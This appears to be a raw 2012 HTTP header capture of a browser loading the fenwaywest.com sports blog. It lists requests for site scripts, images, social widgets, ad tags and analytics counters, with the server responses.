Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://tag.contextweb.com/TagPublish/getjs.aspx?01AD=3TH3EA_dQ0y1CCrc-FcS_JTLX8ev6upfp7r8vEVXCFHQ9feaPMBO06A&amp;01RI=D059FE3705F1C72&amp;01NA=na&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900
Expires: Mon, 19 Nov 2012 04:17:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 19 Nov 2012 04:17:35 GMT
Connection: keep-alive
Set-Cookie: 01AI=2-2-BD51635FC7AA020452B5F540D2FAED12EA3E177096E3AB259E22F179C980B977-06341518BF8819E33871A42AEFB3438D445CBE50CFCF8D0B70C101D174D98F1A; expires=Tue, 19-Nov-2013 04:17:35 GMT; path=/; domain=.abmr.net
P3P: policyref=&quot;http://www.abmr.net/w3c/policy.xml&quot;, CP=&quot;NON DSP COR CURa ADMa DEVa OUR SAMa IND&quot;
GET /curation/maintop/thumbimages/aaron-craft.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 15 Nov 2012 11:21:52 GMT
Etag: &quot;80527e-829d-4ce86db98b400&quot;
Accept-Ranges: bytes
Content-Length: 33437
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /adserver/rsiads.js HTTP/1.1

Host: ads.revsci.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/javascript
Server: Apache-Coyote/1.1
Cache-Control: max-age=86400
Expires: Tue, 20 Nov 2012 04:17:35 GMT
Etag: W/&quot;790-1348712430000&quot;
Last-Modified: Thu, 27 Sep 2012 02:20:30 GMT
Transfer-Encoding: chunked
Content-Encoding: gzip
Vary: Accept-Encoding
Date: Mon, 19 Nov 2012 04:17:35 GMT
GET /curation/mainhot/thumbimages/Tim_Tebow_Announces_Partnership_With_TiVo_-_YouTube.png HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Wed, 14 Nov 2012 21:40:32 GMT
Etag: &quot;791623-1d933-4ce7b62479400&quot;
Accept-Ranges: bytes
Content-Length: 121139
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/warp/js/dropdownmenu.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:32 GMT
Etag: &quot;ecb56b-14b1-4c3876d80c700&quot;
Accept-Ranges: bytes
Content-Length: 5297
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
GET /templates/yoo_bigeasy/fonts/leaguegothic.css HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: text/css
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Fri, 03 Aug 2012 01:25:38 GMT
Etag: &quot;eccad2-1b3-4c65267cdc880&quot;
Accept-Ranges: bytes
Content-Length: 435
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /templates/yoo_bigeasy/warp/js/accordionmenu.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:30 GMT
Etag: &quot;ecb569-58b-4c3876d624280&quot;
Accept-Ranges: bytes
Content-Length: 1419
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /templates/yoo_bigeasy/js/template.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:21:52 GMT
Etag: &quot;ecb55d-373-4c3876063d800&quot;
Accept-Ranges: bytes
Content-Length: 883
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /templates/yoo_bigeasy/warp/js/warp.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:40 GMT
Etag: &quot;ecb56a-1a52-4c3876dfad900&quot;
Accept-Ranges: bytes
Content-Length: 6738
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /templates/yoo_bigeasy/warp/js/search.js HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Thu, 28 Jun 2012 12:25:38 GMT
Etag: &quot;ecb568-f81-4c3876ddc5480&quot;
Accept-Ranges: bytes
Content-Length: 3969
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
GET /curation/maintop/thumbimages/arod%20giambi2.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Wed, 14 Nov 2012 21:36:02 GMT
Etag: &quot;80527d-58b3-4ce7b522fb480&quot;
Accept-Ranges: bytes
Content-Length: 22707
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /widgets.js HTTP/1.1

Host: platform.twitter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
Cache-Control: public, max-age=1800
Last-Modified: Thu, 08 Nov 2012 09:18:39 GMT
Etag: &quot;a888ca6754ffdd1c338f0ee6f07cf733&quot;
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 24583
Date: Mon, 19 Nov 2012 04:17:35 GMT
Connection: keep-alive
P3P: CP=&quot;CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT&quot;
GET /curation/maintop/thumbimages/big%20ten%20maryland.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Mon, 19 Nov 2012 01:17:37 GMT
Etag: &quot;8052aa-7d5b-4cecee1fece40&quot;
Accept-Ranges: bytes
Content-Length: 32091
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /en_US/all.js HTTP/1.1

Host: connect.facebook.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Etag: &quot;9df4c6ffe9f56aa2e95aaa6beb47d5f6&quot;
Content-Encoding: gzip
X-FB-Debug: XDrWQHYi5qIf+UUQUA0qSD1lSu9pvLaqLgxBtcgUWWY=
Content-Length: 58012
Cache-Control: public, max-age=996
Expires: Mon, 19 Nov 2012 04:34:11 GMT
Date: Mon, 19 Nov 2012 04:17:35 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /js/plusone.js HTTP/1.1

Host: apis.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: application/javascript; charset=utf-8
X-UA-Compatible: IE=edge, chrome=1
Etag: &quot;9f40ccce00af865ceb2b70072dc6cf44&quot;
Expires: Mon, 19 Nov 2012 04:17:35 GMT
Date: Mon, 19 Nov 2012 04:17:35 GMT
Cache-Control: private, max-age=1800
Content-Encoding: gzip
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /curation/maintop/thumbimages/hockey%20suits.jpg HTTP/1.1

Host: www.bloguinmedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sat, 17 Nov 2012 20:17:45 GMT
Etag: &quot;80528d-122eb-4ceb693bf4c40&quot;
Accept-Ranges: bytes
Content-Length: 74475
Keep-Alive: timeout=5, max=499
Connection: Keep-Alive
GET /TagPublish/getjs.aspx?01AD=3TH3EA_dQ0y1CCrc-FcS_JTLX8ev6upfp7r8vEVXCFHQ9feaPMBO06A&01RI=D059FE3705F1C72&01NA=na&action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=520266&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=66900 HTTP/1.1

Host: tag.contextweb.com
GET /TagPublish/getjs.aspx?01AD=3TH3EA_dQ0y1CCrc-FcS_JTLX8ev6upfp7r8vEVXCFHQ9feaPMBO06A&amp;01RI=D059FE3705F1C72&amp;01NA=na&amp;action=VIEWAD&amp;cwrun=200&amp;cwadformat=728X90&amp;cwpid=520266&amp;cwwidth=728&amp;cwheight=90&amp;cwpnet=1&amp;cwtagid=66900 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: C2W4=CT-1; cw=cw
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: GlassFish v3
P3P: policyref=&quot;/TagPublish/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;, policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT&quot;
Etag: 64260b9d0554e47b33aad47950ff507b7c7477d9
Cache-Control: max-age=60, public, must-revalidate
Content-Encoding: UTF-8
Date: Mon, 19 Nov 2012 04:17:35 GMT
Content-Length: 8937
Connection: keep-alive
Set-Cookie: C2W4=CT-USR; expires=Mon, 17-Dec-2012 04:17:35 GMT; path=/; domain=.contextweb.com cw=cw;Version=1;Comment=;Domain=.contextweb.com;Path=/;Max-Age=10000
GET /images/stories/facebook_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd18a-613-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 1555
Keep-Alive: timeout=5, max=496
Connection: Keep-Alive
GET /images/stories/youtube_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Tue, 13 Nov 2012 01:57:15 GMT
Etag: &quot;17dfbbc-25b9-4ce56bcaff4c0&quot;
Accept-Ranges: bytes
Content-Length: 9657
Keep-Alive: timeout=5, max=494
Connection: Keep-Alive
GET /js/counter.js?site=s52bloguinbaseball HTTP/1.1

Host: s21.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Redirect

Content-Type: text/html
Content-Length: 186
Location: http://s21.sitemeter.com/js/counter.asp?site=s52bloguinbaseball
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:17:23 GMT
GET /images/stories/app-iphone-android.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd187-d76-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 3446
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
GET /images/stories/Twitter_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd189-675-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 1653
Keep-Alive: timeout=5, max=498
Connection: Keep-Alive
GET /components/com_obrss/images/buttons/rss_2.0.gif HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Mon, 21 May 2012 00:03:32 GMT
Etag: &quot;eccc09-db-4c080a1ef3d00&quot;
Accept-Ranges: bytes
Content-Length: 219
Keep-Alive: timeout=5, max=497
Connection: Keep-Alive
GET /js/counter.js?site=s27fenwaywest HTTP/1.1

Host: s27.sitemeter.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 302 Redirect

Content-Type: text/html
Content-Length: 181
Location: http://s27.sitemeter.com/js/counter.asp?site=s27fenwaywest
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 19 Nov 2012 04:17:22 GMT
GET /images/stories/rss_64.png HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Last-Modified: Sun, 05 Aug 2012 22:47:02 GMT
Etag: &quot;ecd184-88e-4c68c8a214580&quot;
Accept-Ranges: bytes
Content-Length: 2190
Keep-Alive: timeout=5, max=495
Connection: Keep-Alive
OPTIONS /media/widgetkit/widgets/mediaplayer/mediaelement/mediaelement-and-player.js?_=1353298655645 HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Origin: http://fenwaywest.com
Access-Control-Request-Method: GET
Access-Control-Request-Headers: x-requested-with
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
OPTIONS /media/widgetkit/widgets/lightbox/js/lightbox.js?_=1353298655642 HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Origin: http://fenwaywest.com
Access-Control-Request-Method: GET
Access-Control-Request-Headers: x-requested-with
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /quant.js HTTP/1.1

Host: edge.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: Apache
Last-Modified: Fri, 16 Nov 2012 21:56:51 GMT
Accept-Ranges: bytes
Content-Length: 2386
Content-Encoding: gzip
Cache-Control: private, max-age=86400
Expires: Tue, 20 Nov 2012 04:17:36 GMT
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: keep-alive
Vary: Accept-Encoding
OPTIONS /media/widgetkit/widgets/spotlight/js/spotlight.js?_=1353298655647 HTTP/1.1

Host: www.fenwaywest.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Origin: http://fenwaywest.com
Access-Control-Request-Method: GET
Access-Control-Request-Headers: x-requested-with
HTTP/1.1 200 OK

Content-Type: application/javascript
Date: Mon, 19 Nov 2012 04:17:35 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_bwlimited/1.4
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Keep-Alive: timeout=5, max=500
Connection: Keep-Alive
GET /unica/ntpagetag.js HTTP/1.1

Host: www.yardbarker.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Server: nginx/1.0.15
Last-Modified: Tue, 25 Sep 2012 18:48:47 GMT
Content-Encoding: gzip
Content-Length: 3951
Vary: Accept-Encoding
Date: Mon, 19 Nov 2012 04:17:36 GMT
Connection: keep-alive
X-N: S
GET /templates/yoo_bigeasy/images/logo.jpg HTTP/1.1

Host: www.fenwaywest.com

